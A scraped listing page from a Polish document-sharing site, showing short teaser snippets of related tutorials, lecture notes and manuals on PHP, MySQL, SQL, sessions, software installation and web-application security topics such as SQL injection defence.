Zagadnienia. Konstrukcja bibliotek mysql i mysqli w PHP. Dynamiczne generowanie stron. Połączenie, zapytanie i sesja Zagadnienia Konstrukcja bibliotek mysql i mysqli w PHP Dynamiczne generowanie stron Połączenie, zapytanie i sesja Podstawowe opakowanie dla zapytań SQL w PHP Zarządzania uŝytkownikami Włamania do mysql

Bardziej szczegółowo

SQL (ang. Structured Query Language)

SQL (ang. Structured Query Language) SQL (ang. Structured Query Language) SELECT pobranie danych z bazy, INSERT umieszczenie danych w bazie, UPDATE zmiana danych, DELETE usunięcie danych z bazy. Rozkaz INSERT Rozkaz insert dodaje nowe wiersze

Bardziej szczegółowo

Technologie Internetowe Raport z wykonanego projektu Temat: Internetowy sklep elektroniczny

Technologie Internetowe Raport z wykonanego projektu Temat: Internetowy sklep elektroniczny Technologie Internetowe Raport z wykonanego projektu Temat: Internetowy sklep elektroniczny AiRIII gr. 2TI sekcja 1 Autorzy: Tomasz Bizon Józef Wawrzyczek 2 1. Wstęp Celem projektu było stworzenie sklepu

Bardziej szczegółowo

Aplikacje WWW - laboratorium

Aplikacje WWW - laboratorium Aplikacje WWW - laboratorium PHP + bazy danych Celem ćwiczenia jest przygotowanie prostej aplikacji internetowej wykorzystującej technologię PHP. Aplikacja pokazuje takie aspekty, współpraca PHP z bazami

Bardziej szczegółowo

Zagrożenia trywialne. Zagrożenia bezpieczeństwa aplikacji internetowych. Parametry ukryte. Modyfikowanie parametrów wywołania

Zagrożenia trywialne. Zagrożenia bezpieczeństwa aplikacji internetowych. Parametry ukryte. Modyfikowanie parametrów wywołania Zagrożenia trywialne Zagrożenia bezpieczeństwa aplikacji internetowych Rozwiązania charakterystyczne dla fazy rozwoju opisy rozpoznanych błędów, debugging, komentarze poprzednie wersje plików (cp plik.jsp

Bardziej szczegółowo

Rys. 1. Widok uruchomienia polecenia apt-get install build-essential. Rys. 2. Widok uruchomienia polecenia apt-get install apache2

Rys. 1. Widok uruchomienia polecenia apt-get install build-essential. Rys. 2. Widok uruchomienia polecenia apt-get install apache2 1. Instalacja serwera WWW Aby zainstalować serwer WWW w systemie Linux, należy wykorzystać menedżer pakietów apt-get. Polecenia które należy wpisać w terminalu użytkownika root 1 : apt-get install build-essential

Bardziej szczegółowo

Aplikacje internetowe - laboratorium

Aplikacje internetowe - laboratorium Aplikacje internetowe - laboratorium PHP Celem ćwiczenia jest przygotowanie prostej aplikacji internetowej opartej o język PHP. Aplikacja ilustruje takie mechanizmy jak: obsługa formularzy oraz obsługa

Bardziej szczegółowo

Sesje, ciasteczka, wyjątki. Ciasteczka w PHP. Zastosowanie cookies. Sprawdzanie obecności ciasteczka

Sesje, ciasteczka, wyjątki. Ciasteczka w PHP. Zastosowanie cookies. Sprawdzanie obecności ciasteczka Sesje, ciasteczka, wyjątki Nie sposób wyobrazić sobie bez nich takich podstawowych zastosowań, jak logowanie użytkowników czy funkcjonowanie koszyka na zakupy. Oprócz tego dowiesz się, czym są wyjątki,

Bardziej szczegółowo

Plan. Wprowadzenie. Co to jest APEX? Wprowadzenie. Administracja obszarem roboczym

Plan. Wprowadzenie. Co to jest APEX? Wprowadzenie. Administracja obszarem roboczym 1 Wprowadzenie do środowiska Oracle APEX, obszary robocze, użytkownicy Wprowadzenie Plan Administracja obszarem roboczym 2 Wprowadzenie Co to jest APEX? Co to jest APEX? Architektura Środowisko Oracle

Bardziej szczegółowo

Zajęcia 10 obsługa formularzy w PHP

Zajęcia 10 obsługa formularzy w PHP Zajęcia 10 obsługa formularzy w PHP Przekazywanie danych ze strony do skryptu PHP Dane ze strony WWW do skryptu PHP przekazujemy za pomocą formularzy. W tym celu musimy stworzyć formularz (znacznik ),

Bardziej szczegółowo

Ćwiczenia laboratoryjne nr 11 Bazy danych i SQL.

Ćwiczenia laboratoryjne nr 11 Bazy danych i SQL. Prezentacja Danych i Multimedia II r Socjologia Ćwiczenia laboratoryjne nr 11 Bazy danych i SQL. Celem ćwiczeń jest poznanie zasad tworzenia baz danych i zastosowania komend SQL. Ćwiczenie I. Logowanie

Bardziej szczegółowo

Data modyfikacji: 2013-08-14

Data modyfikacji: 2013-08-14 Data modyfikacji: 2013-08-14 Co zawiera ten dokument: Ten dokument przedstawia, w jaki sposób zainstalować program Kancelaris PLUS 4 za pomocą standardowego instalatora na serwerze MySQL w wersji 5.0 i

Bardziej szczegółowo

Nr: 12. Tytuł: UDOSTĘPNIANIE DANYCH O SPRAWACH KLIENTOM KANCELARII NA ZEWNĘTRZNYCH SERWERACH WWW. Data modyfikacji: 2012-03-08

Nr: 12. Tytuł: UDOSTĘPNIANIE DANYCH O SPRAWACH KLIENTOM KANCELARII NA ZEWNĘTRZNYCH SERWERACH WWW. Data modyfikacji: 2012-03-08 Nr: 12 Tytuł: UDOSTĘPNIANIE DANYCH O SPRAWACH KLIENTOM KANCELARII NA ZEWNĘTRZNYCH SERWERACH WWW Data modyfikacji: 2012-03-08 Co zawiera ten dokument: Ten dokument zawiera informacje o możliwościach i sposobie

Bardziej szczegółowo

Kontrola sesji w PHP HTTP jest protokołem bezstanowym (ang. stateless) nie utrzymuje stanu między dwoma transakcjami. Kontrola sesji służy do

Kontrola sesji w PHP HTTP jest protokołem bezstanowym (ang. stateless) nie utrzymuje stanu między dwoma transakcjami. Kontrola sesji służy do Sesje i ciasteczka Kontrola sesji w PHP HTTP jest protokołem bezstanowym (ang. stateless) nie utrzymuje stanu między dwoma transakcjami. Kontrola sesji służy do śledzenia użytkownika podczas jednej sesji

Bardziej szczegółowo

Budowa aplikacji ASP.NET współpracującej z bazą dany do obsługi przesyłania wiadomości

Budowa aplikacji ASP.NET współpracującej z bazą dany do obsługi przesyłania wiadomości Budowa aplikacji ASP.NET współpracującej z bazą dany do obsługi przesyłania wiadomości część 3 przejdziemy teraz do zaprojektowania strony przegladaj_dzialami.aspx na której użytkownicy będą przeglądać

Bardziej szczegółowo

Internetowe bazy danych

Internetowe bazy danych Wyższa Szkoła Technologii Teleinformatycznych w Świdnicy Internetowe bazy danych wykład 7 dr inż. Jacek Mazurkiewicz e-mail: Jacek.Mazurkiewicz@pwr.wroc.pl Sesje i stan aplikacji w kategorii czasu okres

Bardziej szczegółowo

Języki programowania wysokiego poziomu. Ćwiczenia

Języki programowania wysokiego poziomu. Ćwiczenia Języki programowania wysokiego poziomu Ćwiczenia Języki programowania Ćwiczenia Strukturalny HTML Arkusze CSS Formularze HTML i PHP Baza danych MySQL Forum internetowe Strukturalny HTML Zadania Dokument

Bardziej szczegółowo

Bezpieczeństwo systemów komputerowych

Bezpieczeństwo systemów komputerowych Bezpieczeństwo systemów komputerowych Zagrożenia dla aplikacji internetowych Aleksy Schubert (Marcin Peczarski) Instytut Informatyki Uniwersytetu Warszawskiego 15 grudnia 2015 Lista zagadnień Wstrzykiwanie

Bardziej szczegółowo

Zakres tematyczny dotyczący kursu PHP i MySQL - Podstawy pracy z dynamicznymi stronami internetowymi

Zakres tematyczny dotyczący kursu PHP i MySQL - Podstawy pracy z dynamicznymi stronami internetowymi Zakres tematyczny dotyczący kursu PHP i MySQL - Podstawy pracy z dynamicznymi stronami internetowymi 1 Rozdział 1 Wprowadzenie do PHP i MySQL Opis: W tym rozdziale kursanci poznają szczegółową charakterystykę

Bardziej szczegółowo

Forte Zarządzanie Produkcją Instalacja i konfiguracja. Wersja B

Forte Zarządzanie Produkcją Instalacja i konfiguracja. Wersja B Forte Zarządzanie Produkcją Instalacja i konfiguracja Wersja 2013.1.B Forte Zarządzanie Produkcją - Instalacja i konfiguracja Strona 2 z 13 SPIS TREŚCI 1 Instalacja i konfiguracja Forte Zarządzanie Produkcją...

Bardziej szczegółowo

Wykład 5. SQL praca z tabelami 2

Wykład 5. SQL praca z tabelami 2 Wykład 5 SQL praca z tabelami 2 Wypełnianie tabel danymi Tabele można wypełniać poprzez standardową instrukcję INSERT INTO: INSERT [INTO] nazwa_tabeli [(kolumna1, kolumna2,, kolumnan)] VALUES (wartosc1,

Bardziej szczegółowo

WINDOWS Instalacja serwera WWW na systemie Windows XP, 7, 8.

WINDOWS Instalacja serwera WWW na systemie Windows XP, 7, 8. WINDOWS Instalacja serwera WWW na systemie Windows XP, 7, 8. Gdy już posiadamy serwer i zainstalowany na nim system Windows XP, 7 lub 8 postawienie na nim serwera stron WWW jest bardzo proste. Wystarczy

Bardziej szczegółowo

Informatyka I. Programowanie aplikacji bazodanowych w języku Java. Standard JDBC.

Informatyka I. Programowanie aplikacji bazodanowych w języku Java. Standard JDBC. Informatyka I Programowanie aplikacji bazodanowych w języku Java. Standard JDBC. dr hab. inż. Andrzej Czerepicki Politechnika Warszawska Wydział Transportu 2019 Standard JDBC Java DataBase Connectivity

Bardziej szczegółowo

Informatyka I. Standard JDBC Programowanie aplikacji bazodanowych w języku Java

Informatyka I. Standard JDBC Programowanie aplikacji bazodanowych w języku Java Informatyka I Standard JDBC Programowanie aplikacji bazodanowych w języku Java dr inż. Andrzej Czerepicki Politechnika Warszawska Wydział Transportu 2017 Standard JDBC Java DataBase Connectivity uniwersalny

Bardziej szczegółowo

SZYBKI START. Tworzenie nowego połączenia w celu zaszyfrowania/odszyfrowania danych lub tekstu 2. Szyfrowanie/odszyfrowanie danych 4

SZYBKI START. Tworzenie nowego połączenia w celu zaszyfrowania/odszyfrowania danych lub tekstu 2. Szyfrowanie/odszyfrowanie danych 4 SZYBKI START Tworzenie nowego połączenia w celu zaszyfrowania/odszyfrowania danych lub tekstu 2 Szyfrowanie/odszyfrowanie danych 4 Szyfrowanie/odszyfrowanie tekstu 6 Tworzenie nowego połączenia w celu

Bardziej szczegółowo

Opis aktualizacji programu Kancelaria Komornika

Opis aktualizacji programu Kancelaria Komornika Opis aktualizacji programu Kancelaria Komornika ZUS-EKS Currenda sp. z o.o.; 30-348 K rakó w, ul. B o b rz y ńs ki e g o 3 9 b / 1 7 t el. (12) 3 5 8-01-3 1, (12) 359-78-98 f a x (1 2 ) 358-01-01 w. 6

Bardziej szczegółowo

Palety by CTI. Instrukcja

Palety by CTI. Instrukcja Palety by CTI Instrukcja Spis treści 1. Logowanie... 3 2. Okno główne programu... 4 3. Konfiguracja... 5 4. Zmiana Lokalizacji... 6 5. Nowa Paleta z dokumentu MMP... 8 6. Realizacja Zlecenia ZW... 10 7.

Bardziej szczegółowo

mysql> UPDATE user SET Password=PASSWORD('pass') WHERE user='root'; Query OK, 2 rows affected (0.05 sec) Rows matched: 2 Changed: 2 Warnings: 0

mysql> UPDATE user SET Password=PASSWORD('pass') WHERE user='root'; Query OK, 2 rows affected (0.05 sec) Rows matched: 2 Changed: 2 Warnings: 0 Uprawnienia dla uż ytkowników MANIPULACJA UPRAWNIENIAMI Przechodzimy do cześci nadawania oraz odbierania uprawnie ń. Wszelkie zmiany dotyczące tabel w bazie mysql można przeprowadza ć za pomoc ą znanych

Bardziej szczegółowo

Wprowadzenie do Internetu Zajęcia 5

Wprowadzenie do Internetu Zajęcia 5 Zajęcia 5 Formularze w PHP Przekazywanie danych ze strony do skryptu PHP Dane ze strony WWW do skryptu PHP można przekazać za pomocą formularzy. W tym celu należy stworzyć formularz (znacznik ),

Bardziej szczegółowo

ZPKSoft WDoradca. 1. Wstęp 2. Architektura 3. Instalacja 4. Konfiguracja 5. Jak to działa 6. Licencja

ZPKSoft WDoradca. 1. Wstęp 2. Architektura 3. Instalacja 4. Konfiguracja 5. Jak to działa 6. Licencja ZPKSoft WDoradca 1. Wstęp 2. Architektura 3. Instalacja 4. Konfiguracja 5. Jak to działa 6. Licencja 1. Wstęp ZPKSoft WDoradca jest technologią dostępu przeglądarkowego do zasobów systemu ZPKSoft Doradca.

Bardziej szczegółowo

Należy ściągnąć oprogramowanie Apache na platformę

Należy ściągnąć oprogramowanie Apache na platformę Programowanie Internetowe Język PHP - wprowadzenie 1. Instalacja Oracle+Apache+PHP Instalacja Apache, PHP, Oracle Programy i ich lokalizacja Oracle Database 10g Express Edition10.2 http://www.oracle.com/technology/products/database/

Bardziej szczegółowo

INFORMATYKA MÓJ SPOSÓB NA POZNANIE I OPISANIE ŚWIATA PROGRAM NAUCZANIA INFORMATYKI Z ELEMENTAMI PRZEDMIOTÓW MATEMATYCZNO-PRZYRODNICZYCH

INFORMATYKA MÓJ SPOSÓB NA POZNANIE I OPISANIE ŚWIATA PROGRAM NAUCZANIA INFORMATYKI Z ELEMENTAMI PRZEDMIOTÓW MATEMATYCZNO-PRZYRODNICZYCH INFORMATYKA MÓJ SPOSÓB NA POZNANIE I OPISANIE ŚWIATA PROGRAM NAUCZANIA INFORMATYKI Z ELEMENTAMI PRZEDMIOTÓW MATEMATYCZNO-PRZYRODNICZYCH Informatyka poziom rozszerzony Serwis WWW w projekcie edukacyjnym

Bardziej szczegółowo

Odnawialne Źródła Energii I rok. Tutorial PostgreSQL

Odnawialne Źródła Energii I rok. Tutorial PostgreSQL Tutorial PostgreSQL 1. Instalacja na własnym komputerze: a. Zainstaluj program ze strony: https://www.postgresql.org/download/ Wersja odpowiednia dla systemu operacyjnego Linux, Mac, Windows Przy pierwszym

Bardziej szczegółowo

INTERNETOWE BAZY DANYCH materiały pomocnicze - wykład VII

INTERNETOWE BAZY DANYCH materiały pomocnicze - wykład VII Wrocław 2006 INTERNETOWE BAZY DANYCH materiały pomocnicze - wykład VII Paweł Skrobanek C-3, pok. 323 e-mail: pawel.skrobanek@pwr.wroc.pl INTERNETOWE BAZY DANYCH PLAN NA DZIŚ : Cookies Sesje Inne możliwości

Bardziej szczegółowo

SSI Web 8. (badania.kozminski.edu.pl) Instrukcja logowania i uruchamiania ankiety

SSI Web 8. (badania.kozminski.edu.pl) Instrukcja logowania i uruchamiania ankiety SSI Web 8 (badania.kozminski.edu.pl) Instrukcja logowania i uruchamiania ankiety Posiadaczem licencji na oprogramowanie SSI Web w Akademii Leona Koźmińskiego jest Centrum Psychologii Ekonomicznej i Badań

Bardziej szczegółowo

Bazy Danych - Instrukcja do Ćwiczenia laboratoryjnego nr 8

Bazy Danych - Instrukcja do Ćwiczenia laboratoryjnego nr 8 Bazy Danych - Instrukcja do Ćwiczenia laboratoryjnego nr 8 Bazowy skrypt PHP do ćwiczeń z bazą MySQL: Utwórz skrypt o nazwie cw7.php zawierający następującą treść (uzupełniając go o właściwą nazwę uŝytkownika

Bardziej szczegółowo

Dokumentacja serwisu internetowego Zespołu Szkół Technicznych w Radomiu.

Dokumentacja serwisu internetowego Zespołu Szkół Technicznych w Radomiu. Dokumentacja serwisu internetowego Zespołu Szkół Technicznych w Radomiu. Wykonanie: Radom Maj 2008 1 Serwis WWW szkoły w Internecie to obecnie najszybszy i najtańszy sposób dotarcia do największego kręgu

Bardziej szczegółowo

Bazy Danych i Usługi Sieciowe

Bazy Danych i Usługi Sieciowe Bazy Danych i Usługi Sieciowe Język PHP Paweł Witkowski Wydział Matematyki, Informatyki i Mechaniki Jesień 2011 P. Witkowski (Wydział Matematyki, Informatyki i Mechaniki) BDiUS w. VIII Jesień 2011 1 /

Bardziej szczegółowo

Tworzenie witryn internetowych PHP/Java. (mgr inż. Marek Downar)

Tworzenie witryn internetowych PHP/Java. (mgr inż. Marek Downar) Tworzenie witryn internetowych PHP/Java (mgr inż. Marek Downar) Rodzaje zawartości Zawartość statyczna Treść statyczna (np. nagłówek, stopka) Layout, pliki multimedialne, obrazki, elementy typograficzne,

Bardziej szczegółowo

Bezpieczeństwo Systemów Informacyjnych lab. 13

Bezpieczeństwo Systemów Informacyjnych lab. 13 Atak typu: zastrzyk SQL, metody obrony Wstęp Wielu początkujących programistów tworzących różne aplikacje webowe korzysta najczęściej takich technologii jak język PHP, serwer baza danych Mysql, Postgresql.

Bardziej szczegółowo

BAZY DANYCH. Obsługa bazy z poziomu języka PHP. opracowanie: Michał Lech

BAZY DANYCH. Obsługa bazy z poziomu języka PHP. opracowanie: Michał Lech BAZY DANYCH Obsługa bazy z poziomu języka PHP opracowanie: Michał Lech Plan wykładu 1. PHP - co to jest? 2. Bazy danych obsługiwane przez PHP 3. Podstawowe polecenia 4. Sesje 5. Przykład - dodawanie towaru

Bardziej szczegółowo

P o d s t a w y j ę z y k a S Q L

P o d s t a w y j ę z y k a S Q L P o d s t a w y j ę z y k a S Q L Adam Cakudis IFP UAM Użytkownicy System informatyczny Aplikacja Aplikacja Aplikacja System bazy danych System zarządzania baz ą danych Schemat Baza danych K o n c e p

Bardziej szczegółowo

Spis treści. 1. Konfiguracja systemu ewuś...3. 2. Logowanie się do systemu ewuś...6. 3. Korzystanie z systemu ewuś...6. 4. Weryfikacja cykliczna...

Spis treści. 1. Konfiguracja systemu ewuś...3. 2. Logowanie się do systemu ewuś...6. 3. Korzystanie z systemu ewuś...6. 4. Weryfikacja cykliczna... Centralny Ośrodek Informatyki Górnictwa S.A. KSOP Obsługa systemu ewuś Katowice, 2013 Spis treści 1. Konfiguracja systemu ewuś...3 2. Logowanie się do systemu ewuś...6 3. Korzystanie z systemu ewuś...6

Bardziej szczegółowo

Pracownia internetowa w szkole ZASTOSOWANIA

Pracownia internetowa w szkole ZASTOSOWANIA NR ART/SBS/07/01 Pracownia internetowa w szkole ZASTOSOWANIA Artykuły - serwery SBS i ich wykorzystanie Instalacja i Konfiguracja oprogramowania MOL Optiva na szkolnym serwerze (SBS2000) Artykuł opisuje

Bardziej szczegółowo

Wysyłanie pliku na serwer. Plik na serwerze.

Wysyłanie pliku na serwer. Plik na serwerze. Wysyłanie pliku na serwer Dzięki PHP możemy w łatwy i przyjemny sposób obsłużyć pliki uploadowane na serwer. Jednak, by prawidłowo wysłać plik, niezbędny będzie odpowiedni formularz HTML. Poniżej przedstawię

Bardziej szczegółowo

Instrukcja dla użytkowników Windows Vista Certyfikat Certum Basic ID

Instrukcja dla użytkowników Windows Vista Certyfikat Certum Basic ID Instrukcja dla użytkowników Windows Vista Certyfikat Certum Basic ID wersja 1.3 Spis treści 1. INSTALACJA CERTYFIKATU... 3 1.1. KLUCZ ZAPISANY BEZPOŚREDNIO DO PRZEGLĄDARKI (NA TYM KOMPUTERZE),... 3 1.2.

Bardziej szczegółowo

Wdrożenie modułu płatności eservice. dla systemu Zen Cart 1.3.9 1.5

Wdrożenie modułu płatności eservice. dla systemu Zen Cart 1.3.9 1.5 Wdrożenie modułu płatności eservice dla systemu Zen Cart 1.3.9 1.5 - dokumentacja techniczna Wer. 01 Warszawa, styczeń 2014 1 Spis treści: 1 Wstęp... 3 1.1 Przeznaczenie dokumentu... 3 1.2 Przygotowanie

Bardziej szczegółowo

Certyfikat Certum Basic ID. Instrukcja dla użytkowników Windows Vista. wersja 1.3 UNIZETO TECHNOLOGIES SA

Certyfikat Certum Basic ID. Instrukcja dla użytkowników Windows Vista. wersja 1.3 UNIZETO TECHNOLOGIES SA Certyfikat Certum Basic ID Instrukcja dla użytkowników Windows Vista wersja 1.3 Spis treści 1. INSTALACJA CERTYFIKATU... 3 1.1. KLUCZ ZAPISANY BEZPOŚREDNIO DO PRZEGLĄDARKI (NA TYM KOMPUTERZE),... 3 1.2.

Bardziej szczegółowo

Podstawy programowania (PHP/Java)

Podstawy programowania (PHP/Java) Studia Podyplomowe Aplikacje i usługi internetowe Podstawy programowania (PHP/Java) Materiały pomocnicze do zajęć laboratoryjnych cz. II styczeń 2014 Opracował dr inż. Andrzej Jędruch 4. MySQL z poziomu

Bardziej szczegółowo

Laboratorium nr 4. Temat: SQL część II. Polecenia DML

Laboratorium nr 4. Temat: SQL część II. Polecenia DML Laboratorium nr 4 Temat: SQL część II Polecenia DML DML DML (Data Manipulation Language) słuŝy do wykonywania operacji na danych do ich umieszczania w bazie, kasowania, przeglądania, zmiany. NajwaŜniejsze

Bardziej szczegółowo

INSTRUKCJA INSTALACJI DATAMOBILE. Ver. 1.3

INSTRUKCJA INSTALACJI DATAMOBILE. Ver. 1.3 INSTRUKCJA INSTALACJI DATAMOBILE Ver. 1.3 Strona 1 SPIS TREŚCI 1. POBIERANIE SERWERA PHP... 3 2. INSTALACJA SERWERA PHP... 3 3. POBIERANIE DATAMOBILE SERVER... 5 4. INSTALACJA DATAMOBILE SERVER... 5 5.

Bardziej szczegółowo

Instrukcja generowania certyfikatu PFRON i podpisywania dokumentów aplikacji SODiR w technologii JS/PKCS 12

Instrukcja generowania certyfikatu PFRON i podpisywania dokumentów aplikacji SODiR w technologii JS/PKCS 12 Instrukcja generowania certyfikatu PFRON i podpisywania dokumentów aplikacji SODiR w technologii JS/PKCS 12 Wersja 3.0 02-03-2017 Spis treści Instrukcja generowania certyfikatu PFRON i podpisywania dokumentów

Bardziej szczegółowo

Jednym z najważniejszych zagadnień, z którym może się zetknąć twórca

Jednym z najważniejszych zagadnień, z którym może się zetknąć twórca Uwierzytelnianie w PHP 01 Jednym z najważniejszych zagadnień, z którym może się zetknąć twórca stron internetowych, jest identyfikacja i uwierzytelnienie uprzywilejowanego użytkownika. Od zaprojektowania

Bardziej szczegółowo

Umieszczanie kodu. kod skryptu

Umieszczanie kodu. kod skryptu PHP Definicja PHP jest językiem skryptowym służącym do rozszerzania możliwości stron internetowych. Jego składnia jest bardzo podobna do popularnych języków programowania C/C++, lecz jest bardzo uproszczona

Bardziej szczegółowo

IIIIIIIIIIIIIIIMMIMMIII

IIIIIIIIIIIIIIIMMIMMIII IIIIIIIIIIIIIIIMMIMMIII O programie Program Itelix itender Manager przeznaczony jest do zarządzania zapytaniami ofertowymi przesyłanymi za pomocą poczty elektronicznej przez firmy korzystające z systemu

Bardziej szczegółowo

Współpraca z platformą Emp@tia. dokumentacja techniczna

Współpraca z platformą Emp@tia. dokumentacja techniczna Współpraca z platformą Emp@tia dokumentacja techniczna INFO-R Spółka Jawna - 2013 43-430 Pogórze, ul. Baziowa 29, tel. (33) 479 93 29, (33) 479 93 89 fax (33) 853 04 06 e-mail: admin@ops.strefa.pl Strona1

Bardziej szczegółowo

TOPIT Załącznik nr 3 Programowanie aplikacji internetowych

TOPIT Załącznik nr 3 Programowanie aplikacji internetowych Szkolenie przeznaczone jest dla osób chcących poszerzyć swoje umiejętności o tworzenie rozwiązań internetowych w PHP. Zajęcia zostały przygotowane w taki sposób, aby po ich ukończeniu można było rozpocząć

Bardziej szczegółowo

strukturalny język zapytań używany do tworzenia i modyfikowania baz danych oraz do umieszczania i pobierania danych z baz danych

strukturalny język zapytań używany do tworzenia i modyfikowania baz danych oraz do umieszczania i pobierania danych z baz danych SQL SQL (ang. Structured Query Language): strukturalny język zapytań używany do tworzenia strukturalny język zapytań używany do tworzenia i modyfikowania baz danych oraz do umieszczania i pobierania danych

Bardziej szczegółowo

Dokumentacja systemu NTP rekrut. Autor: Sławomir Miller

Dokumentacja systemu NTP rekrut. Autor: Sławomir Miller Dokumentacja systemu NTP rekrut Autor: Sławomir Miller 1 Spis treści: 1. Wstęp 1.1 Wprowadzenie 1.2 Zakres dokumentu 2. Instalacja 2.1 Wymagania systemowe 2.2 Początek 2.3 Prawa dostępu 2.4 Etapy instalacji

Bardziej szczegółowo

Kancelaria rozpoczęcie pracy z programem

Kancelaria rozpoczęcie pracy z programem Kancelaria rozpoczęcie pracy z programem Przyciski w programie Kancelaria 2.0 i Kancelaria LT Przyciski dostępne w poszczególnych modułach programu (na dole okien): Przejście do pierwszego Przejście do

Bardziej szczegółowo

PHP: bazy danych, SQL, AJAX i JSON

PHP: bazy danych, SQL, AJAX i JSON 1 PHP: bazy danych, SQL, AJAX i JSON SYSTEMY SIECIOWE Michał Simiński 2 Bazy danych Co to jest MySQL? Jak się połączyć z bazą danych MySQL? Podstawowe operacje na bazie danych Kilka dodatkowych operacji

Bardziej szczegółowo

Certyfikat niekwalifikowany zaufany Certum Silver. Instalacja i użytkowanie pod Windows Vista. wersja 1.0 UNIZETO TECHNOLOGIES SA

Certyfikat niekwalifikowany zaufany Certum Silver. Instalacja i użytkowanie pod Windows Vista. wersja 1.0 UNIZETO TECHNOLOGIES SA Certyfikat niekwalifikowany zaufany Certum Silver Instalacja i użytkowanie pod Windows Vista wersja 1.0 Spis treści 1. POBRANIE CERTYFIKATU SILVER... 3 2. IMPORT CERTYFIKATU DO PROGRAMU POCZTA SYSTEMU

Bardziej szczegółowo

Poradnik zetula.pl. Jak założyć konto na zetula.pl. i zabezpieczyć dane na swoim komputerze?

Poradnik zetula.pl. Jak założyć konto na zetula.pl. i zabezpieczyć dane na swoim komputerze? Poradnik zetula.pl Jak założyć konto na zetula.pl i zabezpieczyć dane na swoim komputerze? 1.Wejdź na stronę www.zetula.pl 2.Kliknij na odnośniku Utwórz nowe konto 3.Wypełnij formularz rejestracyjny. Pola

Bardziej szczegółowo

emszmal 3: Automatyczne księgowanie przelewów w sklepie internetowym PrestaShop (plugin dostępny w wersji ecommerce)

emszmal 3: Automatyczne księgowanie przelewów w sklepie internetowym PrestaShop (plugin dostępny w wersji ecommerce) emszmal 3: Automatyczne księgowanie przelewów w sklepie internetowym PrestaShop (plugin dostępny w wersji ecommerce) Zastosowanie Rozszerzenie to dedykowane jest sklepom internetowych zbudowanym w oparciu

Bardziej szczegółowo

Klient poczty elektronicznej - Thunderbird

Klient poczty elektronicznej - Thunderbird Klient poczty elektronicznej - Thunderbird Wstęp Wstęp Klient poczty elektronicznej, to program który umożliwia korzystanie z poczty bez konieczności logowania się na stronie internetowej. Za jego pomocą

Bardziej szczegółowo

Programowanie komponentowe. Przykład 1 Bezpieczeństwo wg The Java EE 5 Tutorial Autor: Zofia Kruczkiewicz

Programowanie komponentowe. Przykład 1 Bezpieczeństwo wg The Java EE 5 Tutorial Autor: Zofia Kruczkiewicz Programowanie komponentowe Przykład 1 Bezpieczeństwo wg The Java EE 5 Tutorial Autor: Zofia Kruczkiewicz Struktura wykładu 1. Utworzenie użytkowników i ról na serwerze aplikacji Sun Java System Application

Bardziej szczegółowo

INSTRUKCJA UŻYTKOWNIKA Podpis cyfrowy ISO 9001:2008 Dokument: 2016.0.0.0 Wydanie: 2016-01. Podpis cyfrowy. Spis treści... 1

INSTRUKCJA UŻYTKOWNIKA Podpis cyfrowy ISO 9001:2008 Dokument: 2016.0.0.0 Wydanie: 2016-01. Podpis cyfrowy. Spis treści... 1 Spis treści Spis treści... 1 Wstęp... 2 Przygotowanie certyfikatów wewnętrznych... 2 2.1. Przygotowanie karty pracownika... 2 2.2. Dodawanie certyfikatu nadrzędnego... 3 2.3. Dodawanie certyfikatu pracownika...

Bardziej szczegółowo

Telesprzedaż by CTI Instrukcja

Telesprzedaż by CTI Instrukcja Telesprzedaż by CTI Instrukcja 1 Spis treści 1. Opis programu...4 2. Konfiguracja...5 2.1. Połączenie z serwerem MS SQL...6 2.2. Połączenie z serwerem MS SQL systemu Call Center...7 2.3. Nawiązanie połączenia

Bardziej szczegółowo

Najważniejsze informacje dla klienta na temat Portalu Serwisowego D-Link Spis treści

Najważniejsze informacje dla klienta na temat Portalu Serwisowego D-Link Spis treści Najważniejsze informacje dla klienta na temat Portalu Serwisowego D-Link Spis treści Rozdział 1: Rejestracja i logowanie do Portalu Serwisowego... 2 Rozdział 2: Informacje ogólne... 4 Rozdział 3: Rejestracja

Bardziej szczegółowo

System Symfonia e-dokumenty

System Symfonia e-dokumenty System Symfonia e-dokumenty Konfiguracja Symfonia e-dokumenty Wersja 2012.1 Konfiguracja Symfonia e-dokumenty 2012.1 Instalacja Symfonia e-dokumenty 2012.1 Należy pamiętać, że na danym systemie operacyjnym

Bardziej szczegółowo

INSTRUKCJA INSTALACJI I KONFIGURACJI APLIKACJI WEBSOFT SITE ANALYZER 2.7.1

INSTRUKCJA INSTALACJI I KONFIGURACJI APLIKACJI WEBSOFT SITE ANALYZER 2.7.1 INSTRUKCJA INSTALACJI I KONFIGURACJI APLIKACJI WEBSOFT SITE ANALYZER 2.7.1 Producent: Lukaszjarosinski.com Nazwa oprogramowania: Websoft Site Analyzer 2.7.1 Wersja finalna: 28.02.2013 Kontakt: lukaszjarosinski@gmail.com,

Bardziej szczegółowo

Dokumentacja SMS przez FTP

Dokumentacja SMS przez FTP Dokumentacja SMS przez FTP 1 Wprowadzenie... 2 Właściwości plików... 3 Tworzenie konfiguracji w Panelu Klienta... 4 Raporty doręczeń... 5 Historia zmian... 6 2 Wprowadzenie Usługa wysyłki SMS przez FTP

Bardziej szczegółowo

Snifery wbudowane w Microsoft Windows

Snifery wbudowane w Microsoft Windows Snifery wbudowane w Microsoft Windows Prezentację przygotowali: Robert Milczarski Łukasz Stegliński Maciej Łaski Network Monitorw w Microsoft Windows Server 2003 Wbudowany w Windows monitor sieci wykorzystywany

Bardziej szczegółowo